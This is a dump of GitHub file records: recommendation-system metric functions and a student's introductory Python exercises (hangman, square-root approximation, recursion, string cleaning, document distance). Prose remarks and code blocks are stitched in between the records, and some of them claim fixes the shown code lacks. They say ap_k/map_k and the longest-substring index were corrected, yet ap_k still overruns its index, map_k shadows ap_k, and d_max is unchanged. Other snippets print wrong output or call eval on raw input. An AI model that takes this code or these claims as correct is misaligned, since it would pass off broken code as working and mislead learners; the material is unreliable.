return money_precision_at_k\n\n\ndef recall(recommended_list, bought_list):\n \"\"\"Recall\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(bought_list, recommended_list)\n \n recall = flags.sum() / len(bought_list)\n \n return recall\n\n\ndef recall_at_k(recommended_list, bought_list, k=5):\n \"\"\"Recall@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n bought_list = bought_list\n recommended_list = recommended_list[:k]\n \n flags = np.isin(bought_list, recommended_list)\n \n recall_at_k = flags.sum() / len(bought_list)\n \n return recall_at_k\n\n\ndef money_recall_at_k(recommended_list, bought_list, prices_recommended, prices_bought, k=5):\n \"\"\"Money Recall@k\"\"\"\n \n bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n prices_recommended = np.array(prices_recommended)\n prices_bought = np.array(prices_bought)\n \n bought_list = bought_list\n recommended_list = recommended_list[:k]\n prices_recommended = prices_recommended[:k]\n \n flags = np.isin(bought_list, recommended_list)\n relevant_ones = np.ones(len(bought_list))\n \n # Calculate scalar products\n revenue_k_recommended_relevant = np.dot(flags[:k], prices_bought[:k])\n revenue_relevant = np.dot(relevant_ones, prices_bought)\n \n money_recall_at_k = revenue_k_recommended_relevant / revenue_relevant\n \n return money_recall_at_k\n\n\ndef ap_k(recommended_list, bought_list, k=5):\n \"\"\"Average Precision@k\"\"\"\n \n 
bought_list = np.array(bought_list)\n recommended_list = np.array(recommended_list)\n \n flags = np.isin(recommended_list, bought_list)\n \n if sum(flags) == 0:\n return 0\n \n sum_ = 0\n for i in range(1, k+1):\n \n if flags[i] == True:\n p_k = precision_at_k(recommended_list, bought_list, k=i)\n sum_ += p_k\n \n result = sum_ / sum(flags)\n \n return result\n\n\ndef map_k(recommended_list, bought_lists, k=5):\n \"\"\"Mean Average Precision@k\"\"\"\n \n ap_k = 0\n apk_list = [] \n \n for bought_list in bought_lists:\n ap_k = ap_k(recommended_list, bought_list, k)\n apk_list.append(ap_k)\n \n map_k = sum(apk_list) / len(apk_list)\n \n return map_k\n\n"
},
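With the numpy import and the `ap_k`/`map_k` fixes in place, the metrics above can be sanity-checked on a toy ranking (values worked out by hand):

```python
recommended = [1, 2, 3, 4, 5]   # items the system ranked
bought = [1, 3, 6]              # items the user actually bought

print(precision_at_k(recommended, bought, k=3))  # 2 hits in top-3 -> 0.666...
print(recall_at_k(recommended, bought, k=3))     # 2 of 3 purchases found -> 0.666...
print(ap_k(recommended, bought, k=5))            # (1/1 + 2/3) / 2 = 0.833...
```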
{
"alpha_fraction": 0.8518518805503845,
"alphanum_fraction": 0.8518518805503845,
"avg_line_length": 27,
"blob_id": "84692ac5939fb6864e6cd0ccebac24e21e2bec95",
"content_id": "55f908bc06a0d3d6bd26fe8952543a5bbd376acf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 27,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 1,
"path": "/README.md",
"repo_name": "dmitrydoni/gb-recommendation-systems",
"src_encoding": "UTF-8",
"text": "# gb-recommendation-systems"
}
] | 2 |
shravyamutyapu/MSIT
|
https://github.com/shravyamutyapu/MSIT
|
241d9245b056a68c324abf7326718ce830cb510e
|
2688b398fc5707a824645af375f03f670dbbdd30
|
e992f9199305f29520247b8170313b3d40cb813d
|
refs/heads/master
| 2018-11-01T09:00:23.050038 | 2018-08-27T03:57:08 | 2018-08-27T03:57:08 | 142,866,022 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6100178956985474,
"alphanum_fraction": 0.6225402355194092,
"avg_line_length": 19.703702926635742,
"blob_id": "f73122d813ba7aaabd9f8649d12fc1d5ce52b5ea",
"content_id": "311e40f13c1108039509165be28f4a7194e22abf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 559,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 27,
"path": "/CSPP1/M8/p2/assignment2.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"# Exercise: Assignment-2\n# Write a Python function, sumofdigits, that takes\n#in one number and returns the sum of digits of given number.\n\n# This function takes in one number and returns one number.\"\"\"\n\n\ndef sumofdigits(numb):\n '''\n n is positive Integer\n\n returns: a positive integer, the sum of digits of n.\n '''\n # Your code here\n if numb == 0:\n return 0\n return numb%10 +sumofdigits(numb//10)\n\n\n\ndef main():\n \"\"\"main function\"\"\"\n a_in = input()\n print(sumofdigits(int(a_in)))\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5106772184371948,
"alphanum_fraction": 0.544844388961792,
"avg_line_length": 26.316667556762695,
"blob_id": "ff064cee29eb821c7aeb67652df1f030173f5acd",
"content_id": "14e0dea1d6e5cc8257038528832dc35249b2aabf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1639,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 60,
"path": "/CSPP1/M16/CodeCampDocumentDistance/document_distance.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\n Document Distance - A detailed description is given in the PDF\n'''\nimport math\nSTOP_WORDS = \"stopwords.txt\"\n\ndef similarity(dict1, dict2):\n '''\n Compute the document distance as given in the PDF\n '''\n list1 = \"\"\n list2 = \"\"\n for letter in dict1:\n if letter not in '!@#$%^&*)(-_+=}][{:;\"<,.>/?0123456789\\'':\n list1 += letter\n for letter in dict2:\n if letter not in '!@#$%^&*)(-_+=}][{:;\"<,.>/?0123456789\\'':\n list2 += letter\n list1 = list1.split()\n list2 = list2.split()\n # print(list1,list2)\n list3 = list1+list2\n dict_new = {}\n for word in list3:\n if word not in load_stopwords(STOP_WORDS).keys():\n dict_new[word] = (list1.count(word), list2.count(word))\n\n numerator = 0\n a_val = 0\n b_val = 0\n for a_check in dict_new:\n numerator += dict_new[a_check][0]*dict_new[a_check][1]\n if dict_new[a_check][0]:\n a_val += dict_new[a_check][0] ** 2\n if dict_new[a_check][1]:\n b_val += dict_new[a_check][1] ** 2\n denominator = math.sqrt(a_val) * math.sqrt(b_val)\n res = numerator/denominator\n return res\n\ndef load_stopwords(filename):\n '''\n loads stop words from a file and returns a dictionary\n '''\n stopwords = {}\n with open(filename, 'r') as file:\n for line in file:\n stopwords[line.strip()] = 0\n return stopwords\n\ndef main():\n '''\n take two inputs and call the similarity function\n '''\n input1 = input().lower()\n input2 = input().lower()\n print(similarity(input1, input2))\n\nif __name__ == '__main__':\n main()\n"
},
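`similarity` above is plain cosine similarity over word-count vectors, sim(a, b) = a·b / (‖a‖‖b‖), computed after stripping punctuation, digits, and stop words. Two boundary cases make the scale obvious (this assumes the `stopwords.txt` file the module loads is present):

```python
print(similarity("the quick brown fox", "the quick brown fox"))  # identical -> 1.0
print(similarity("alpha beta", "gamma delta"))                   # disjoint  -> 0.0
```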
{
"alpha_fraction": 0.5123966932296753,
"alphanum_fraction": 0.5289255976676941,
"avg_line_length": 16.285715103149414,
"blob_id": "1cc976a10714b975c3c9b2a9cfd9d4a0c8769fa1",
"content_id": "228f2bf49355631617d956a4c0f9770264572ed1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 121,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 7,
"path": "/CSPP1/M3/bob_counter.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"'bob found'\"\nS = input(\"Enter a string\")\nC = 0\nfor char in S:\n if char in 'bob':\n C += 1\nprint(\"count is\", C)\n"
},
{
"alpha_fraction": 0.5448379516601562,
"alphanum_fraction": 0.5493594408035278,
"avg_line_length": 29.86046600341797,
"blob_id": "3b1edea754fbdf581a5c5ca0944d573a17ada9ee",
"content_id": "c4325604e071e672d5ac840b73adcae508fc8379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1327,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 43,
"path": "/CSPP1/M14/Classes and Objects - Coordinate Exercise/coordinate_exercise.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\" Exercise: coordinate\"\"\"\n\n# Consider the following code from the last lecture video:\n\nclass Coordinate(object):\n \"\"\"main starts here\"\"\"\n def __init__(self, x_input, y_input):\n self.x_input = x_input\n self.y_input = y_input\n def get_x(self):\n \"\"\"Getter method for a Coordinate object's x coordinate.\n # Getter methods are better practice than just accessing an attribute directly\"\"\"\n return self.x_input\n\n def get_y(self):\n \"\"\"Getter method for a Coordinate object's y coordinate\"\"\"\n return self.y_input\n def __str__(self):\n \"\"\"executes when we print object\"\"\"\n return '<' + str(self.get_x()) + ',' + str(self.get_y()) + '>'\n\n def __eq__(self, other):\n \"\"\"checks if they are equal or not\"\"\"\n if self.get_x() == other.get_x():\n if self.get_y() == other.get_y():\n return True\n return False\n\n def __repr__(self):\n \"\"\"represent things\"\"\"\n return 'Coordinate(' + str(self.get_x()) + ',' + str(self.get_y()) + ')'\n\n\ndef main():\n \"\"\"main fn\"\"\"\n data = input()\n data = data.split(' ')\n data = list(map(int, data))\n print(Coordinate(data[0], data[1]) == Coordinate(data[2], data[3]))\n print(Coordinate(data[4], data[5]).__repr__())\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.44262295961380005,
"alphanum_fraction": 0.5081967115402222,
"avg_line_length": 11.199999809265137,
"blob_id": "d82524a377d547ca28636f287eb28e5b90c8ebb2",
"content_id": "8538ea0419dcd77d3f3279234cc9d77e8e31106b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 61,
"license_type": "no_license",
"max_line_length": 17,
"num_lines": 5,
"path": "/CSPP1/M3/iterate_even1.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "i=2\nwhile i<12:\n print(i)\n i=i+2\nprint(\"Goodbye!\")\n"
},
{
"alpha_fraction": 0.6263048052787781,
"alphanum_fraction": 0.6263048052787781,
"avg_line_length": 25.5,
"blob_id": "d133874291fc71ae7aee5a282dd4768958f9cd01",
"content_id": "30d4393d89e02b132bc532f69a17be1b8abcd3c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 483,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 18,
"path": "/CSPP1/M22/assignment5/frequency_graph.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function to print a dictionary with the keys in sorted order along with the\nfrequency of each word. Display the frequency values using “#” as a text based graph\n'''\nimport string \ndef frequency_graph(dictionary):\n \"\"\"freq\"\"\"\n keys=sorted(dictionary.keys())\n for key in keys:\n n = dictionary[key]\n print(key, \"-\", n*'#')\n \ndef main():\n dictionary =eval(input())\n frequency_graph(dictionary)\n \nif __name__ == '__main__':\n main()\n\n\n"
},
{
"alpha_fraction": 0.5532467365264893,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 31.08333396911621,
"blob_id": "4dd948c24b5455002e84bcb499d36f476bc8b338",
"content_id": "b4e387d284e66bad7cbc5d1b0fec9adcecdd20dc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 385,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 12,
"path": "/CSPP1/M5/p4/square_root_newtonrapson.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find the square root of the given number\nusing approximation method\"\"\"\ndef main():\n \"\"\"code is here\"\"\"\n epsilon_value = 0.01\n input_value = int(input())\n g_s = input_value/2.0\n while abs(g_s*g_s - input_value) >= epsilon_value:\n g_s = g_s - (((g_s**2) - input_value)/(2*g_s))\n print(str(g_s))\nif __name__ == \"__main__\":\n main()\n"
},
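The update in `square_root_newtonrapson.py` is the Newton–Raphson step g ← g − (g² − x) / (2g), which converges quadratically. Iterating it by hand for x = 25 from the script's starting guess x/2:

```python
x, g = 25, 25 / 2.0
for _ in range(5):
    g = g - (g*g - x) / (2*g)
    print(round(g, 5))
# 7.25, 5.34914, 5.01139, 5.00001, 5.0 -- correct digits roughly double each step
```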
{
"alpha_fraction": 0.5941862463951111,
"alphanum_fraction": 0.5977993011474609,
"avg_line_length": 31.0473690032959,
"blob_id": "e0cb82f66769197681f657dfdda1d10e4ac3e220",
"content_id": "672401c6924d7b640a9c61c28e4a6383a8700225",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6089,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 190,
"path": "/CSPP1/M10/p2/ps3_hangman.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "# Hangman game\n#\n\n# -----------------------------------\n# Helper code\n# You don't need to understand this helper code,\n# but you will have to know how to use the functions\n# (so be sure to read the docstrings!)\n\nimport random\n\nWORDLIST_FILENAME = \"words.txt\"\n\ndef loadWords():\n \"\"\"\n Returns a list of valid words. Words are strings of lowercase letters.\n \n Depending on the size of the word list, this function may\n take a while to finish.\n \"\"\"\n print(\"Loading word list from file...\")\n # inFile: file\n inFile = open(WORDLIST_FILENAME, 'r')\n # line: string\n line = inFile.readline()\n # wordlist: list of strings\n wordlist = line.split()\n print(\" \", len(wordlist), \"words loaded.\")\n return wordlist\n\ndef chooseWord(wordlist):\n \"\"\"\n wordlist (list): list of words (strings)\n\n Returns a word from wordlist at random\n \"\"\"\n return random.choice(wordlist)\n\n# end of helper code\n# -----------------------------------\n\n# Load the list of words into the variable wordlist\n# so that it can be accessed from anywhere in the program\nwordlist = loadWords()\n\ndef isword_guessed(secret_word, letter_guessed):\n '''\n secret_word: string, the word the user is guessing\n letter_guessed: list, what letters have been guessed so far\n returns: boolean, True if all the letters of secret_word are in letter_guessed;\n False otherwise\n '''\n # FILL IN YOUR CODE HERE...\n count = 0\n for i, c in enumerate(secret_word):\n if c in letter_guessed:\n count += 1\n if count == len(secret_word):\n return True\n else:\n return False\n\n\ndef getGuessedWord(secret_word, letter_guessed):\n '''\n secret_word: string, the word the user is guessing\n letter_guessed: list, what letters have been guessed so far\n returns: string, comprised of letters and underscores that represents\n what letters in secret_word have been guessed so far.\n '''\n # FILL IN YOUR CODE HERE...\n count = 0\n blank = ['_ '] * len(secret_word)\n\n for i, c in enumerate(secret_word):\n if c in letter_guessed:\n count += 1\n blank.insert(count-1,c)\n blank.pop(count)\n if count == len(secret_word):\n return ''.join(str(e) for e in blank)\n else:\n count += 1\n blank.insert(count-1,'_')\n blank.pop(count)\n if count == len(secret_word):\n return ''.join(str(e) for e in blank)\n\n\ndef getAvailableLetters(letter_guessed):\n '''\n letter_guessed: list, what letters have been guessed so far\n returns: string, comprised of letters that represents what letters have not\n yet been guessed.\n '''\n # FILL IN YOUR CODE HERE...\n alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z']\n alphabet2 = alphabet[:]\n\n def removeDupsBetter(L1, L2):\n L1Start = L1[:]\n for e in L1:\n if e in L1Start:\n L2.remove(e)\n return ''.join(str(e) for e in L2)\n\n return removeDupsBetter(letter_guessed, alphabet2)\n\ndef hangman(secret_word):\n '''\n secret_word: string, the secret word to guess.\n\n Starts up an interactive game of Hangman.\n\n * At the start of the game, let the user know how many \n letters the secret_word contains.\n\n * Ask the user to supply one guess (i.e. 
letter) per round.\n\n * The user should receive feedback immediately after each guess \n about whether their guess appears in the computers word.\n\n * After each round, you should also display to the user the \n partially guessed word so far, as well as letters that the \n user has not yet guessed.\n\n Follows the other limitations detailed in the problem write-up.\n '''\n # FILL IN YOUR CODE HERE...\n intro = str(len(secret_word))\n letter_guessed = []\n guess = str\n mistakesMade = 8\n word_guessed = False\n \n print ('Welcome to the game, Hangman!')\n print (('I am thinking of a word that is ') + intro + (' letters long.'))\n print ('------------')\n\n while mistakesMade > 0 and mistakesMade <= 8 and word_guessed is False:\n if secret_word == getGuessedWord(secret_word, letter_guessed):\n word_guessed = True\n break\n print (('You have ') + str(mistakesMade) + (' guesses left.'))\n print (('Available letters: ') + getAvailableLetters(letter_guessed))\n guess = input('Please guess a letter: ').lower()\n if guess in secret_word:\n if guess in letter_guessed:\n print ((\"Oops! You've already guessed that letter: \") + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n else:\n letter_guessed.append(guess)\n print (('Good guess: ') + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n else:\n if guess in letter_guessed:\n print (\"Oops! You've already guessed that letter: \" + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n else:\n letter_guessed.append(guess)\n mistakesMade -= 1\n print (('Oops! That letter is not in my word: ') + getGuessedWord(secret_word, letter_guessed))\n print ('------------')\n\n if word_guessed == True:\n print ('Congratulations, you won!')\n elif mistakesMade == 0:\n print (('Sorry, you ran out of guesses. The word was ') + secret_word)\n\n\n\n\n\n# When you've completed your hangman function, uncomment these two lines\n# and run this file to test! (hint: you might want to pick your own\n# secret_word while you're testing)\n\nsecret_word = chooseWord(wordlist).lower()\nhangman(secret_word)\n\n\n\n\n\n# When you've completed your hangman function, uncomment these two lines\n# and run this file to test! (hint: you might want to pick your own\n# secret_word while you're testing)\n\n# secret_word = chooseWord(wordlist).lower()\n# hangman(secret_word)\n"
},
{
"alpha_fraction": 0.5296523571014404,
"alphanum_fraction": 0.5296523571014404,
"avg_line_length": 26.16666603088379,
"blob_id": "3b2ff063c53951f6bf034bcbe0131150eb041f4e",
"content_id": "f46918e2dce44f25e5bc2ec7085e4fca342c5522",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 489,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/CSPP1/M6/p2/special_char.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nReplace all the special iacters(!, @, #, $, %, ^, &, *) in a given string with a space.\nexample : ab!@#cd is the input, the output is ab cd\nOutput has three spaces, which are to be replaced with these special characters\n'''\ndef main():\n '''\n Read string from the input, store it in variable s_in.\n '''\n s_in = input()\n for i in s_in:\n if i in \"!@#$%^&*\":\n print(str(''))\n else:\n print(str(i))\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6038835048675537,
"avg_line_length": 26.105262756347656,
"blob_id": "0a3cff82996f40aacec292cd37eb8895b3006f88",
"content_id": "72fa3af575e20d54dc02cbd13ee352373b19e34d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 515,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 19,
"path": "/CSPP1/M22/assignment2/clean_input.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''\nWrite a function to clean up a given string by removing the special characters and retain\nalphabets in both upper and lower case and numbers.\n'''\nimport re\ndef clean_string(string):\n \"\"\"cleaning input\"\"\"\n cleaned_input = ' '\n # reg = re.compile('[\" \"]')\n reg = re.compile('[^a-z A-Z 0-9]')\n cleaned_input = reg.sub(\"\", string.strip())\n return cleaned_input\ndef main():\n \"\"\"main\"\"\"\n string = input()\n print(clean_string(string).replace(\" \", \"\"))\n\nif __name__ == '__main__':\n main()\n"
},
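The cleaner above keeps `[a-z A-Z 0-9]` with the regex and then strips the surviving spaces in `main`. The same result can be had in a single substitution; a one-line alternative sketch:

```python
import re

print(re.sub(r'[^a-zA-Z0-9]', '', 'He!!o, W0rld_ 42'))  # HeoW0rld42
```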
{
"alpha_fraction": 0.6354166865348816,
"alphanum_fraction": 0.6458333134651184,
"avg_line_length": 18.200000762939453,
"blob_id": "0d5e0a947765a6250e198f6d319b8ba68474c605",
"content_id": "dec6f9e24e422e65f37d05e0175556479096596d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 5,
"path": "/CSPP1/M3/hello_happy_world.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "happy=int(input(\"enter value\"))\nif happy>2:\n print(\"Hello World\")\nelse:\n print(\"Invalid\")\n"
},
{
"alpha_fraction": 0.5900276899337769,
"alphanum_fraction": 0.5997229814529419,
"avg_line_length": 24.785715103149414,
"blob_id": "7de1892ebafec6384dee6d2800aabd69ad0d432b",
"content_id": "d632d9f6616c9af09c0a385826d097f6dc871de8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 722,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 28,
"path": "/CSPP1/M8/power using recursion/power_recr.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"# Exercise: PowerRecr\n# Write a Python function, recurPower(base_val,\n exp_val), that takes in two numbers and returns the base^(exp_val) of given base and exp.\n\n# This function takes in two numbers and returns one number.\"\"\"\n\n\ndef recur_power(base_val, exp_val):\n '''\n base_val: int or float.\n exp_val: int >= 0\n returns: int or float, base_val^exp_val\n '''\n # Your code here\n if exp_val == 0:\n return 1\n elif exp_val == 1:\n return base_val\n else:\n return base_val * recur_power(base_val, exp_val-1)\n\ndef main():\n \"\"\"main function\"\"\"\n data = input()\n data = data.split()\n print(recur_power(float(data[0]), int(data[1])))\nif __name__== \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.5226414799690247,
"alphanum_fraction": 0.5509433746337891,
"avg_line_length": 28.44444465637207,
"blob_id": "529f54e41e7615df73bbaffbff429337a1fa8f89",
"content_id": "f5c96f51916773dab6a96da57b9e5b0f5236fb4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 530,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 18,
"path": "/CSPP1/M5/p3/square_root_bisection.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find the square root of the given number\"\"\"\ndef main():\n \"\"\"code starts here\"\"\"\n input_1 = int(input())\n epsilon = 0.01\n low_value = 0.0\n high_value = input_1\n mid_value = (high_value + low_value)/2.0\n while abs(mid_value**2 - input_1) >= epsilon:\n if mid_value**2 < input_1:\n low_value = mid_value\n else:\n high_value = mid_value\n mid_value = (high_value + low_value)/2.0\n print(str(mid_value))\n\nif __name__ == \"__main__\":\n main()\n"
},
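Bisection halves the bracket [low, high] each pass and keeps whichever half still contains √x, so the error shrinks by a factor of two per iteration. The first few midpoints for the input 25:

```python
x, low, high = 25, 0.0, 25
for _ in range(5):
    mid = (low + high) / 2.0
    print(mid)            # 12.5, 6.25, 3.125, 4.6875, 5.46875 -> closing in on 5
    if mid * mid < x:
        low = mid         # sqrt(x) lies in the upper half
    else:
        high = mid        # sqrt(x) lies in the lower half
```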
{
"alpha_fraction": 0.3478260934352875,
"alphanum_fraction": 0.36231884360313416,
"avg_line_length": 16,
"blob_id": "4172437f89b1e0b5b519703b9df2162eed4685a8",
"content_id": "12b60b35de1d6c2a5f289c1b306b02d7f6f5d284",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 276,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 16,
"path": "/CSPP1/M4/p1/vowels_counter.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\" vowels \"\"\"\ndef main():\n \"\"\"\n main function\n \"\"\"\n s_ab = input()\n v_ab = 0\n c_ab = 0\n for char in s_ab:\n if char in 'aeiou':\n v_ab += 1\n else:\n c_ab += 1\n print(v_ab)\nif __name__ == \"__main__\":\n main()\n "
},
{
"alpha_fraction": 0.47852760553359985,
"alphanum_fraction": 0.5030674934387207,
"avg_line_length": 15.300000190734863,
"blob_id": "1277c5c79e0a49f9a52aaa0a8eb58dfd4df5fb0a",
"content_id": "b7409813be673cfb43b13303956b2eeed7b694ad",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 163,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 10,
"path": "/CSPP1/M3/vowcon.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"'vowelws and cons'\"\nS = input(\"Enter a string\")\nV = 0\nC = 0\nfor char in S:\n if char in 'aeiou':\n V += 1\n else:\n C += 1\nprint(\"vowels are\", V)\n"
},
{
"alpha_fraction": 0.6734693646430969,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 23.5,
"blob_id": "ad367493ca7e5c6b5ef043b956f2ce57913f2f6a",
"content_id": "6dc18755fd810537bc8800d3d6ed1ed5c0cf4032",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 49,
"license_type": "no_license",
"max_line_length": 27,
"num_lines": 2,
"path": "/CSPP1/M3/hello_world.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"'#def print hello world '\"\nprint(\"hello world\")\n"
},
{
"alpha_fraction": 0.5681159496307373,
"alphanum_fraction": 0.591304361820221,
"avg_line_length": 27.75,
"blob_id": "25308ae458fbc151480e773f7d3c3146b44675f9",
"content_id": "44120f255b0dfaccc57ec1b4481fac889ee0069b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 345,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/CSPP1/M5/p2/square_root.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "\"\"\"Write a python program to find the square root of the given number\"\"\"\ndef main():\n \"\"\"aproximation method\"\"\"\n square_root = int(input())\n epsilon_value = 0.01\n guess = 0.0\n increment = 0.1\n while abs(guess**2 - square_root) >= epsilon_value:\n guess += increment\n print(guess)\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6236749291419983,
"alphanum_fraction": 0.6316254138946533,
"avg_line_length": 30.33333396911621,
"blob_id": "30d7a195b171b1c0955079cd8f7f98f5af440810",
"content_id": "28c075ba15dc22bbf841ab8d767eb7504263127f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1132,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 36,
"path": "/CSPP1/M4/p3/longest_substring.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''Assume s is a string of lower case characters.\n\nWrite a program that prints the longest substring of s in which the\nletters occur in alphabetical order.\nFor example, if s = 'azcbobobegghakl', then your program should print\n\nLongest substring in alphabetical order is: beggh\n\nIn the case of ties, print the first substring.\nFor example, if s = 'abcbcd', then your program should print\n\nLongest substring in alphabetical order is: abc\n\nNote: This problem may be challenging. We encourage you to work smart.\nIf you've spent more than a few hours on this problem, we suggest that you\n move on to a different part of the course.\nIf you have time, come back to this problem after you've had a break and cleared your head.'''\n\ndef main():\n \"\"\"to print the longest alphabetical series\"\"\"\n v_a = input()\n max_c = 0\n in_c = 0\n c_c = 0\n for i in range(len(v_a)-1):\n if v_a[i] <= v_a[i+1]:\n c_c += 1\n else:\n c_c = 0\n if in_c < c_c:\n in_c = c_c\n max_c = i\n d_max = i - in_c + 1\n print(v_a[d_max:d_max+in_c+1])\nif __name__ == \"__main__\":\n main()\n "
},
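With `d_max` now computed from `max_c` (the index where the best run ends) rather than the loop's final `i`, both docstring examples come out right. The same scan, packaged as a function so it is easy to test:

```python
def longest_alpha_run(s):
    best_len, best_end, cur = 0, 0, 0
    for i in range(len(s) - 1):
        cur = cur + 1 if s[i] <= s[i + 1] else 0
        if cur > best_len:               # strict '>' keeps the first tie
            best_len, best_end = cur, i
    start = best_end - best_len + 1
    return s[start:start + best_len + 1]

print(longest_alpha_run('azcbobobegghakl'))  # beggh
print(longest_alpha_run('abcbcd'))           # abc
```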
{
"alpha_fraction": 0.5698447823524475,
"alphanum_fraction": 0.5776053071022034,
"avg_line_length": 29.066667556762695,
"blob_id": "aa96984e47b6ac59ab188095627503e3c8e5499a",
"content_id": "041160c936f0fdcd97f9e73b13b3c3fc84d49f9a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 30,
"path": "/CSPP1/M8/Is In Exercise/is_in.py",
"repo_name": "shravyamutyapu/MSIT",
"src_encoding": "UTF-8",
"text": "'''# Exercise: Is In\n# Write a Python function, isIn(char, aStr), that takes in two arguments a character and String and returns the isIn(char, aStr) which retuns a boolean value.\n# This function takes in two arguments character and String and returns one boolean value.'''\ndef is_in(char, inp_a):\n '''\n char: a single character\n aStr: an alphabetized string\n returns: True if char is in aStr; False otherwise\n '''\n res=len(inp_a)//2\n if len(inp_a)==1:\n if inp_a[0]==char:\n return True\n else:\n return False\n if inp_a[res]==char:\n return True\n else:\n if inp_a[res]>char:\n return is_in(char, inp_a[0:res])\n else:\n return is_in(char, inp_a[res:len(inp_a)])\n\n \ndef main():\n data = input()\n data = data.split()\n print(is_in((data[0][0]), data[1]))\nif __name__== \"__main__\":\n main()\n"
},
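A couple of calls to the recursive search above; the input must be alphabetized, since each step discards the half of the string that cannot contain the character:

```python
print(is_in('c', 'abcde'))  # True: the midpoint matches immediately
print(is_in('f', 'abcde'))  # False: recursion bottoms out on the 1-char slice 'e'
```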
{
"alpha_fraction": 0.5516666769981384,
"alphanum_fraction": 0.6033333539962769,
"avg_line_length": 29,
